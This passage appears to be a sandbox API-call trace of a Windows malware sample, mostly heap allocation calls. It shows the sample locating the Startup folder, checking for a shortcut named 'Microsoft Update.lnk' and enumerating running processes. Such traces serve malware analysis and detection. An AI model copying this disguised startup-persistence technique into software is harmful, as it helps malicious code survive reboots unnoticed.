(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0295.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0295.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0295.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0295.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0295.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0295.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0295.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0295.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0295.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0295.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0295.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0295.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0295.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0295.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0295.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0295.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0295.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0295.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0295.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0295.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0295.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0295.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0295.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0295.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0295.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0295.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0295.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0295.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0295.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0295.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0295.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0295.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0295.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0295.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0295.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0295.713] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0295.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0295.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0295.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0295.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0295.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0295.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0295.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0295.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0295.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0295.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0295.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0295.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0295.714] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0295.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0295.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0295.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0295.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0295.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0295.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0295.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0295.715] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0295.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0295.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0295.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0295.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0295.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0295.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0295.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0295.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0295.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0295.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0295.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0295.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0295.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0295.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0295.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0295.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0295.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0295.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0295.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0295.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0295.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0295.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0295.717] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0295.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0295.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0295.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0295.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0295.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0295.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0295.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0295.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0295.717] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0295.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0295.718] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0295.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0295.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0295.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0295.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0295.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0295.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0295.718] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0295.720] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.721] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0295.722] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0295.723] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0295.724] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0295.725] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0295.726] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0295.726] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0295.727] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0295.728] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0295.729] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.730] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.731] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.734] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.735] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.735] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0295.736] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.737] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.738] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0295.739] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0295.740] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0295.740] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0295.741] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.742] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0295.743] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0295.743] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0295.744] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0295.745] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0295.746] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0295.747] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0295.748] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0295.749] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0295.749] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0295.750] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0295.751] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0295.752] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0295.753] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0295.754] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0295.754] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0295.755] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0295.756] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0295.757] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0295.758] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0295.759] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.759] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0295.760] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.761] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, 